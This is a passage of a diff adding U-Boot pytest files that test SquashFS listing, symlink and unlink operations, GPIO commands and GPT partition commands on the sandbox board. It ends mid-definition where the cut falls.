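+#   4 file(s), 2 dir(s)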
+ +def sqfs_ls_at_subdir(u_boot_console): + """ Runs sqfsls at the SquashFS image's subdir. + + This test checks if the path resolution works, since the directory is not the + root. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + expected_lines = ['100 subdir-file', '1 file(s), 0 dir(s)'] + output = u_boot_console.run_command('sqfsls host 0 subdir') + for line in expected_lines: + assert line in output + +def sqfs_ls_at_symlink(u_boot_console): + """ Runs sqfsls at a SquashFS image's symbolic link. + + This test checks if the symbolic link's target resolution works. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + # since sym -> subdir, the following outputs must be equal + output = u_boot_console.run_command('sqfsls host 0 sym') + output_subdir = u_boot_console.run_command('sqfsls host 0 subdir') + assert output == output_subdir + + expected_lines = ['100 subdir-file', '1 file(s), 0 dir(s)'] + for line in expected_lines: + assert line in output + +def sqfs_ls_at_non_existent_dir(u_boot_console): + """ Runs sqfsls at a file and at a non-existent directory. + + This test checks if the SquashFS support won't crash if it doesn't find the + specified directory or if it takes a file as an input instead of an actual + directory. In both cases, the output should be the same. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + out_non_existent = u_boot_console.run_command('sqfsls host 0 fff') + out_not_dir = u_boot_console.run_command('sqfsls host 0 f1000') + assert out_non_existent == out_not_dir + assert '** Cannot find directory. **' in out_non_existent + +def sqfs_run_all_ls_tests(u_boot_console): + """ Runs all the previously defined test cases. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + sqfs_ls_at_root(u_boot_console) + sqfs_ls_at_empty_dir(u_boot_console) + sqfs_ls_at_subdir(u_boot_console) + sqfs_ls_at_symlink(u_boot_console) + sqfs_ls_at_non_existent_dir(u_boot_console) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_fs_generic') +@pytest.mark.buildconfigspec('cmd_squashfs') +@pytest.mark.buildconfigspec('fs_squashfs') +@pytest.mark.requiredtool('mksquashfs') +@pytest.mark.singlethread +def test_sqfs_ls(u_boot_console): + """ Executes the sqfsls test suite. + + First, it generates the SquashFS images, then it runs the test cases and + finally cleans the workspace. If an exception is raised, the workspace is + cleaned before exiting. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + build_dir = u_boot_console.config.build_dir + + # If the EFI subsystem is enabled and initialized, EFI subsystem tries to + # add EFI boot option when the new disk is detected. If there is no EFI + # System Partition exists, EFI subsystem outputs error messages and + # it ends up with test failure. + # Restart U-Boot to clear the previous state. + # TODO: Ideally EFI test cases need to be fixed, but it will + # increase the number of system reset. 
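+
+ # The loop below runs the ls tests once for every image in STANDARD_TABLE.
+ # After init_standard_table() the table keys map to mksquashfs options
+ # roughly as follows (assuming the option lists in sqfs_common.py):
+ #   'default'       -> ' '  (no extra options)
+ #   'lzo_comp_frag' -> '-comp lzo -always-use-fragments'
+ #   'zstd_no_frag'  -> '-comp zstd -no-fragments'
+ #   'gzip_frag'     -> '-comp gzip -always-use-fragments -noF'
+ # so each image exercises one compression/fragmentation combination.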
+ u_boot_console.restart_uboot() + + # setup test environment + check_mksquashfs_version() + generate_sqfs_src_dir(build_dir) + make_all_images(build_dir) + + # run all tests for each image + for image in STANDARD_TABLE: + try: + image_path = os.path.join(build_dir, image) + u_boot_console.run_command('host bind 0 {}'.format(image_path)) + sqfs_run_all_ls_tests(u_boot_console) + except: + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) + raise AssertionError + + # clean test environment + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) diff --git a/test/py/tests/test_fs/test_symlink.py b/test/py/tests/test_fs/test_symlink.py new file mode 100644 index 00000000000..9ced101a294 --- /dev/null +++ b/test/py/tests/test_fs/test_symlink.py @@ -0,0 +1,130 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Texas Instrument +# Author: Jean-Jacques Hiblot <jjhiblot@ti.com> +# +# U-Boot File System:symlink Test + +""" +This test verifies unlink operation (deleting a file or a directory) +on file system. +""" + +import pytest +import re +from fstest_defs import * +from fstest_helpers import assert_fs_integrity + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestSymlink(object): + def test_symlink1(self, u_boot_console, fs_obj_symlink): + """ + Test Case 1 - create a link. and follow it when reading + """ + fs_type, fs_img, md5val = fs_obj_symlink + with u_boot_console.log.section('Test Case 1 - create link and read'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'ln host 0:0 %s /%s.link ' % (SMALL_FILE, SMALL_FILE), + ]) + assert('' in ''.join(output)) + + output = u_boot_console.run_command_list([ + '%sload host 0:0 %x /%s.link' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 4b - Read full 1MB of small file + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_symlink2(self, u_boot_console, fs_obj_symlink): + """ + Test Case 2 - create chained links + """ + fs_type, fs_img, md5val = fs_obj_symlink + with u_boot_console.log.section('Test Case 2 - create chained links'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'ln host 0:0 %s /%s.link1 ' % (SMALL_FILE, SMALL_FILE), + 'ln host 0:0 /%s.link1 /SUBDIR/%s.link2' % ( + SMALL_FILE, SMALL_FILE), + 'ln host 0:0 SUBDIR/%s.link2 /%s.link3' % ( + SMALL_FILE, SMALL_FILE), + ]) + assert('' in ''.join(output)) + + output = u_boot_console.run_command_list([ + '%sload host 0:0 %x /%s.link3' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 4b - Read full 1MB of small file + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_symlink3(self, u_boot_console, fs_obj_symlink): + """ + Test Case 3 - replace file/link with link + """ + fs_type, fs_img, md5val = fs_obj_symlink + with u_boot_console.log.section('Test Case 1 - create link and read'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'ln host 0:0 %s /%s ' % (MEDIUM_FILE, SMALL_FILE), + 'ln host 0:0 %s /%s.link ' % (MEDIUM_FILE, MEDIUM_FILE), + ]) + assert('' in ''.join(output)) + + output = 
u_boot_console.run_command_list([ + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=a00000' in ''.join(output)) + + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + + output = u_boot_console.run_command_list([ + 'ln host 0:0 %s.link /%s ' % (MEDIUM_FILE, SMALL_FILE), + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=a00000' in ''.join(output)) + + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_symlink4(self, u_boot_console, fs_obj_symlink): + """ + Test Case 4 - create a broken link + """ + fs_type, fs_img, md5val = fs_obj_symlink + with u_boot_console.log.section('Test Case 1 - create link and read'): + + output = u_boot_console.run_command_list([ + 'setenv filesize', + 'ln host 0:0 nowhere /link ', + ]) + assert('' in ''.join(output)) + + output = u_boot_console.run_command( + '%sload host 0:0 %x /link' % + (fs_type, ADDR)) + with u_boot_console.disable_check('error_notification'): + output = u_boot_console.run_command('printenv filesize') + assert('"filesize" not defined' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_unlink.py b/test/py/tests/test_fs/test_unlink.py new file mode 100644 index 00000000000..97aafc63bb5 --- /dev/null +++ b/test/py/tests/test_fs/test_unlink.py @@ -0,0 +1,118 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> +# +# U-Boot File System:unlink Test + +""" +This test verifies unlink operation (deleting a file or a directory) +on file system. 
+""" + +import pytest +from fstest_helpers import assert_fs_integrity + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestUnlink(object): + def test_unlink1(self, u_boot_console, fs_obj_unlink): + """ + Test Case 1 - delete a file + """ + fs_type,fs_img = fs_obj_unlink + with u_boot_console.log.section('Test Case 1 - unlink (file)'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir1/file1' % fs_type, + '%sls host 0:0 dir1/file1' % fs_type]) + assert('' == ''.join(output)) + + output = u_boot_console.run_command( + '%sls host 0:0 dir1/' % fs_type) + assert(not 'file1' in output) + assert('file2' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink2(self, u_boot_console, fs_obj_unlink): + """ + Test Case 2 - delete many files + """ + fs_type,fs_img = fs_obj_unlink + with u_boot_console.log.section('Test Case 2 - unlink (many)'): + output = u_boot_console.run_command('host bind 0 %s' % fs_img) + + for i in range(0, 20): + output = u_boot_console.run_command_list([ + '%srm host 0:0 dir2/0123456789abcdef%02x' % (fs_type, i), + '%sls host 0:0 dir2/0123456789abcdef%02x' % (fs_type, i)]) + assert('' == ''.join(output)) + + output = u_boot_console.run_command( + '%sls host 0:0 dir2' % fs_type) + assert('0 file(s), 2 dir(s)' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink3(self, u_boot_console, fs_obj_unlink): + """ + Test Case 3 - trying to delete a non-existing file should fail + """ + fs_type,fs_img = fs_obj_unlink + with u_boot_console.log.section('Test Case 3 - unlink (non-existing)'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir1/nofile' % fs_type]) + assert('nofile: doesn\'t exist' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink4(self, u_boot_console, fs_obj_unlink): + """ + Test Case 4 - delete an empty directory + """ + fs_type,fs_img = fs_obj_unlink + with u_boot_console.log.section('Test Case 4 - unlink (directory)'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir4' % fs_type]) + assert('' == ''.join(output)) + + output = u_boot_console.run_command( + '%sls host 0:0 /' % fs_type) + assert(not 'dir4' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink5(self, u_boot_console, fs_obj_unlink): + """ + Test Case 5 - trying to deleting a non-empty directory ".." + should fail + """ + fs_type,fs_img = fs_obj_unlink + with u_boot_console.log.section('Test Case 5 - unlink ("non-empty directory")'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir5' % fs_type]) + assert('directory is not empty' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink6(self, u_boot_console, fs_obj_unlink): + """ + Test Case 6 - trying to deleting a "." should fail + """ + fs_type,fs_img = fs_obj_unlink + with u_boot_console.log.section('Test Case 6 - unlink (".")'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir5/.' % fs_type]) + assert('directory is not empty' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink7(self, u_boot_console, fs_obj_unlink): + """ + Test Case 7 - trying to deleting a ".." should fail + """ + fs_type,fs_img = fs_obj_unlink + with u_boot_console.log.section('Test Case 7 - unlink ("..")'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir5/..' 
% fs_type]) + assert('directory is not empty' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_gpio.py b/test/py/tests/test_gpio.py new file mode 100644 index 00000000000..3e16e636574 --- /dev/null +++ b/test/py/tests/test_gpio.py @@ -0,0 +1,315 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2021 Adarsh Babu Kalepalli <opensource.kab@gmail.com> +# Copyright (c) 2020 Alex Kiernan <alex.kiernan@gmail.com> + +import pytest +import time +import u_boot_utils + +""" + test_gpio_input is intended to test the fix 4dbc107f4683. + 4dbc107f4683:"cmd: gpio: Correct do_gpio() return value" +""" + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_input(u_boot_console): + """Test that gpio input correctly returns the value of a gpio pin.""" + + response = u_boot_console.run_command('gpio input 0; echo rc:$?') + expected_response = 'rc:0' + assert(expected_response in response) + response = u_boot_console.run_command('gpio toggle 0; gpio input 0; echo rc:$?') + expected_response = 'rc:1' + assert(expected_response in response) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_exit_statuses(u_boot_console): + """Test that non-input gpio commands correctly return the command + success/failure status.""" + + expected_response = 'rc:0' + response = u_boot_console.run_command('gpio clear 0; echo rc:$?') + assert(expected_response in response) + response = u_boot_console.run_command('gpio set 0; echo rc:$?') + assert(expected_response in response) + response = u_boot_console.run_command('gpio toggle 0; echo rc:$?') + assert(expected_response in response) + response = u_boot_console.run_command('gpio status -a; echo rc:$?') + assert(expected_response in response) + + expected_response = 'rc:1' + response = u_boot_console.run_command('gpio nonexistent-command; echo rc:$?') + assert(expected_response in response) + response = u_boot_console.run_command('gpio input 200; echo rc:$?') + assert(expected_response in response) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_read(u_boot_console): + """Test that gpio read correctly sets the variable to the value of a gpio pin.""" + + u_boot_console.run_command('gpio clear 0') + response = u_boot_console.run_command('gpio read var 0; echo val:$var,rc:$?') + expected_response = 'val:0,rc:0' + assert(expected_response in response) + response = u_boot_console.run_command('gpio toggle 0; gpio read var 0; echo val:$var,rc:$?') + expected_response = 'val:1,rc:0' + assert(expected_response in response) + response = u_boot_console.run_command('setenv var; gpio read var nonexistent-gpio; echo val:$var,rc:$?') + expected_response = 'val:,rc:1' + assert(expected_response in response) + +""" +Generic Tests for 'gpio' command on sandbox and real hardware. +The below sequence of tests rely on env__gpio_dev_config for configuration values of gpio pins. + + Configuration data for gpio command. + The set,clear,toggle ,input and status options of 'gpio' command are verified. + For sake of verification,A LED/buzzer could be connected to GPIO pins configured as O/P. 
+ Logic level '1'/'0' can be applied onto GPIO pins configured as I/P + + +env__gpio_dev_config = { + #the number of 'gpio_str_x' strings should equal to + #'gpio_str_count' value + 'gpio_str_count':4 , + 'gpio_str_1': '0', + 'gpio_str_2': '31', + 'gpio_str_3': '63', + 'gpio_str_4': '127', + 'gpio_op_pin': '64', + 'gpio_ip_pin_set':'65', + 'gpio_ip_pin_clear':'66', + 'gpio_clear_value': 'value is 0', + 'gpio_set_value': 'value is 1', + # GPIO pin list to test gpio functionality for each pins, pin should be + # pin names (str) + 'gpio_pin_list': ['gpio@1000031', 'gpio@1000032', 'gpio@20000033'], + # GPIO input output list for shorted gpio pins to test gpio + # functionality for each of pairs, where the first element is + # configured as input and second as output + 'gpio_ip_op_list': [['gpio0', 'gpio1'], ['gpio2', 'gpio3']], +} +""" + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_status_all_generic(u_boot_console): + """Test the 'gpio status' command. + + Displays all gpio pins available on the Board. + To verify if the status of pins is displayed or not, + the user can configure (gpio_str_count) and verify existence of certain + pins.The details of these can be configured in 'gpio_str_n'. + of boardenv_* (example above).User can configure any + number of such pins and mention that count in 'gpio_str_count'. + """ + + f = u_boot_console.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_str_count = f['gpio_str_count'] + + #Display all the GPIO ports + cmd = 'gpio status -a' + response = u_boot_console.run_command(cmd) + + for str_value in range(1,gpio_str_count + 1): + assert f["gpio_str_%d" %(str_value)] in response + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_set_generic(u_boot_console): + """Test the 'gpio set' command. + + A specific gpio pin configured by user as output + (mentioned in gpio_op_pin) is verified for + 'set' option + + """ + + f = u_boot_console.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_op_pin']; + gpio_set_value = f['gpio_set_value']; + + + cmd = 'gpio set ' + gpio_pin_adr + response = u_boot_console.run_command(cmd) + good_response = gpio_set_value + assert good_response in response + + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_clear_generic(u_boot_console): + """Test the 'gpio clear' command. + + A specific gpio pin configured by user as output + (mentioned in gpio_op_pin) is verified for + 'clear' option + """ + + f = u_boot_console.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_op_pin']; + gpio_clear_value = f['gpio_clear_value']; + + + cmd = 'gpio clear ' + gpio_pin_adr + response = u_boot_console.run_command(cmd) + good_response = gpio_clear_value + assert good_response in response + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_toggle_generic(u_boot_console): + """Test the 'gpio toggle' command. 
+ + A specific gpio pin configured by user as output + (mentioned in gpio_op_pin) is verified for + 'toggle' option + """ + + + f = u_boot_console.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_op_pin']; + gpio_set_value = f['gpio_set_value']; + gpio_clear_value = f['gpio_clear_value']; + + cmd = 'gpio set ' + gpio_pin_adr + response = u_boot_console.run_command(cmd) + good_response = gpio_set_value + assert good_response in response + + cmd = 'gpio toggle ' + gpio_pin_adr + response = u_boot_console.run_command(cmd) + good_response = gpio_clear_value + assert good_response in response + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_input_generic(u_boot_console): + """Test the 'gpio input' command. + + Specific gpio pins configured by user as input + (mentioned in gpio_ip_pin_set and gpio_ip_pin_clear) + is verified for logic '1' and logic '0' states + """ + + f = u_boot_console.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_ip_pin_clear']; + gpio_clear_value = f['gpio_clear_value']; + + + cmd = 'gpio input ' + gpio_pin_adr + response = u_boot_console.run_command(cmd) + good_response = gpio_clear_value + assert good_response in response + + + gpio_pin_adr = f['gpio_ip_pin_set']; + gpio_set_value = f['gpio_set_value']; + + + cmd = 'gpio input ' + gpio_pin_adr + response = u_boot_console.run_command(cmd) + good_response = gpio_set_value + assert good_response in response + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_pins_generic(u_boot_console): + """Test various gpio related functionality, such as the input, set, clear, + and toggle for the set of gpio pin list. + + Specific set of gpio pins (by mentioning gpio pin name) configured as + input (mentioned as 'gpio_pin_list') to be tested for multiple gpio + commands. + """ + + f = u_boot_console.config.env.get('env__gpio_dev_config', False) + if not f: + pytest.skip('gpio not configured') + + gpio_pins = f.get('gpio_pin_list', None) + if not gpio_pins: + pytest.skip('gpio pin list are not configured') + + for gpin in gpio_pins: + # gpio input + u_boot_console.run_command(f'gpio input {gpin}') + expected_response = f'{gpin}: input:' + response = u_boot_console.run_command(f'gpio status -a {gpin}') + assert expected_response in response + + # gpio set + u_boot_console.run_command(f'gpio set {gpin}') + expected_response = f'{gpin}: output: 1' + response = u_boot_console.run_command(f'gpio status -a {gpin}') + assert expected_response in response + + # gpio clear + u_boot_console.run_command(f'gpio clear {gpin}') + expected_response = f'{gpin}: output: 0' + response = u_boot_console.run_command(f'gpio status -a {gpin}') + assert expected_response in response + + # gpio toggle + u_boot_console.run_command(f'gpio toggle {gpin}') + expected_response = f'{gpin}: output: 1' + response = u_boot_console.run_command(f'gpio status -a {gpin}') + assert expected_response in response + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_pins_input_output_generic(u_boot_console): + """Test gpio related functionality such as input and output for the list of + shorted gpio pins provided as a pair of input and output pins. This test + will fail, if the gpio pins are not shorted properly. + + Specific set of shorted gpio pins (by mentioning gpio pin name) + configured as input and output (mentioned as 'gpio_ip_op_list') as a + pair to be tested for gpio input output case. 
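+ The output pin is driven with 'gpio set'/'gpio clear' and the resulting level is + read back on the paired input pin using 'gpio status -a'.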
+ """ + + f = u_boot_console.config.env.get('env__gpio_dev_config', False) + if not f: + pytest.skip('gpio not configured') + + gpio_pins = f.get('gpio_ip_op_list', None) + if not gpio_pins: + pytest.skip('gpio pin list for input and output are not configured') + + for gpins in gpio_pins: + u_boot_console.run_command(f'gpio input {gpins[0]}') + expected_response = f'{gpins[0]}: input:' + response = u_boot_console.run_command(f'gpio status -a {gpins[0]}') + assert expected_response in response + + u_boot_console.run_command(f'gpio set {gpins[1]}') + expected_response = f'{gpins[1]}: output:' + response = u_boot_console.run_command(f'gpio status -a {gpins[1]}') + assert expected_response in response + + u_boot_console.run_command(f'gpio clear {gpins[1]}') + expected_response = f'{gpins[0]}: input: 0' + response = u_boot_console.run_command(f'gpio status -a {gpins[0]}') + assert expected_response in response + + u_boot_console.run_command(f'gpio set {gpins[1]}') + expected_response = f'{gpins[0]}: input: 1' + response = u_boot_console.run_command(f'gpio status -a {gpins[0]}') + assert expected_response in response diff --git a/test/py/tests/test_gpt.py b/test/py/tests/test_gpt.py new file mode 100644 index 00000000000..6e135b663e8 --- /dev/null +++ b/test/py/tests/test_gpt.py @@ -0,0 +1,350 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2017 Alison Chaiken +# Copyright (c) 2017, NVIDIA CORPORATION. All rights reserved. + +# Test GPT manipulation commands. + +import os +import pytest +import u_boot_utils + +""" +These tests rely on a 4 MB disk image, which is automatically created by +the test. +""" + +# Mark all tests here as slow +pytestmark = pytest.mark.slow + +def parse_gpt_parts(disk_str): + """Parser a partition string into a list of partitions. + + Args: + disk_str: The disk description string, as returned by `gpt read` + + Returns: + A list of parsed partitions. Each partition is a dictionary with the + string value from each specified key in the partition description, or a + key with with the value True for a boolean flag + """ + parts = [] + for part_str in disk_str.split(';'): + part = {} + for option in part_str.split(","): + if not option: + continue + + if "=" in option: + key, value = option.split("=") + part[key] = value + else: + part[option] = True + + if part: + parts.append(part) + + return parts + +class GptTestDiskImage(object): + """Disk Image used by the GPT tests.""" + + def __init__(self, u_boot_console): + """Initialize a new GptTestDiskImage object. + + Args: + u_boot_console: A U-Boot console. + + Returns: + Nothing. 
+ """ + + filename = 'test_gpt_disk_image.bin' + + persistent = u_boot_console.config.persistent_data_dir + '/' + filename + self.path = u_boot_console.config.result_dir + '/' + filename + + with u_boot_utils.persistent_file_helper(u_boot_console.log, persistent): + if os.path.exists(persistent): + u_boot_console.log.action('Disk image file ' + persistent + + ' already exists') + else: + u_boot_console.log.action('Generating ' + persistent) + fd = os.open(persistent, os.O_RDWR | os.O_CREAT) + os.ftruncate(fd, 4194304) + os.close(fd) + cmd = ('sgdisk', + '--disk-guid=375a56f7-d6c9-4e81-b5f0-09d41ca89efe', + persistent) + u_boot_utils.run_and_log(u_boot_console, cmd) + # part1 offset 1MB size 1MB + cmd = ('sgdisk', '--new=1:2048:4095', '--change-name=1:part1', + '--partition-guid=1:33194895-67f6-4561-8457-6fdeed4f50a3', + '-A 1:set:2', + persistent) + # part2 offset 2MB size 1.5MB + u_boot_utils.run_and_log(u_boot_console, cmd) + cmd = ('sgdisk', '--new=2:4096:7167', '--change-name=2:part2', + '--partition-guid=2:cc9c6e4a-6551-4cb5-87be-3210f96c86fb', + persistent) + u_boot_utils.run_and_log(u_boot_console, cmd) + cmd = ('sgdisk', '--load-backup=' + persistent) + u_boot_utils.run_and_log(u_boot_console, cmd) + + cmd = ('cp', persistent, self.path) + u_boot_utils.run_and_log(u_boot_console, cmd) + +@pytest.fixture(scope='function') +def state_disk_image(u_boot_console): + """pytest fixture to provide a GptTestDiskImage object to tests. + This is function-scoped because it uses u_boot_console, which is also + function-scoped. A new disk is returned each time to prevent tests from + interfering with each other.""" + + return GptTestDiskImage(u_boot_console) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_read(state_disk_image, u_boot_console): + """Test the gpt read command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt read host 0') + assert 'Start 1MiB, size 1MiB' in output + assert 'Block size 512, name part1' in output + assert 'Start 2MiB, size 1MiB' in output + assert 'Block size 512, name part2' in output + output = u_boot_console.run_command('part list host 0') + assert '0x00000800 0x00000fff "part1"' in output + assert '0x00001000 0x00001bff "part2"' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('partition_type_guid') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_read_var(state_disk_image, u_boot_console): + """Test the gpt read command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt read host 0 gpt_parts') + assert 'success!' 
in output + + output = u_boot_console.run_command('echo ${gpt_parts}') + parts = parse_gpt_parts(output.rstrip()) + + assert parts == [ + { + "uuid_disk": "375a56f7-d6c9-4e81-b5f0-09d41ca89efe", + }, + { + "name": "part1", + "start": "0x100000", + "size": "0x100000", + "type": "0fc63daf-8483-4772-8e79-3d69d8477de4", + "uuid": "33194895-67f6-4561-8457-6fdeed4f50a3", + "bootable": True, + }, + { + "name": "part2", + "start": "0x200000", + "size": "0x180000", + "type": "0fc63daf-8483-4772-8e79-3d69d8477de4", + "uuid": "cc9c6e4a-6551-4cb5-87be-3210f96c86fb", + }, + ] + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_verify(state_disk_image, u_boot_console): + """Test the gpt verify command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt verify host 0') + assert 'Verify GPT: success!' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_repair(state_disk_image, u_boot_console): + """Test the gpt repair command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt repair host 0') + assert 'Repairing GPT: success!' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_guid(state_disk_image, u_boot_console): + """Test the gpt guid command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt guid host 0') + assert '375a56f7-d6c9-4e81-b5f0-09d41ca89efe' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_setenv(state_disk_image, u_boot_console): + """Test the gpt setenv command.""" + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt setenv host 0 part1') + assert 'success!' in output + output = u_boot_console.run_command('echo ${gpt_partition_addr}') + assert output.rstrip() == '800' + output = u_boot_console.run_command('echo ${gpt_partition_size}') + assert output.rstrip() == '800' + output = u_boot_console.run_command('echo ${gpt_partition_name}') + assert output.rstrip() == 'part1' + output = u_boot_console.run_command('echo ${gpt_partition_entry}') + assert output.rstrip() == '1' + output = u_boot_console.run_command('echo ${gpt_partition_bootable}') + assert output.rstrip() == '1' + + output = u_boot_console.run_command('gpt setenv host 0 part2') + assert 'success!' 
in output + output = u_boot_console.run_command('echo ${gpt_partition_addr}') + assert output.rstrip() == '1000' + output = u_boot_console.run_command('echo ${gpt_partition_size}') + assert output.rstrip() == 'c00' + output = u_boot_console.run_command('echo ${gpt_partition_name}') + assert output.rstrip() == 'part2' + output = u_boot_console.run_command('echo ${gpt_partition_entry}') + assert output.rstrip() == '2' + output = u_boot_console.run_command('echo ${gpt_partition_bootable}') + assert output.rstrip() == '0' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_save_guid(state_disk_image, u_boot_console): + """Test the gpt guid command to save GUID into a string.""" + + if u_boot_console.config.buildconfig.get('config_cmd_gpt', 'n') != 'y': + pytest.skip('gpt command not supported') + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt guid host 0 newguid') + output = u_boot_console.run_command('printenv newguid') + assert '375a56f7-d6c9-4e81-b5f0-09d41ca89efe' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_part_type_uuid(state_disk_image, u_boot_console): + """Test the gpt partittion type UUID command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('part type host 0:1') + assert '0fc63daf-8483-4772-8e79-3d69d8477de4' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_part_type_save_uuid(state_disk_image, u_boot_console): + """Test the gpt partittion type to save UUID into a string.""" + + if u_boot_console.config.buildconfig.get('config_cmd_gpt', 'n') != 'y': + pytest.skip('gpt command not supported') + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('part type host 0:1 newguid') + output = u_boot_console.run_command('printenv newguid') + assert '0fc63daf-8483-4772-8e79-3d69d8477de4' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def 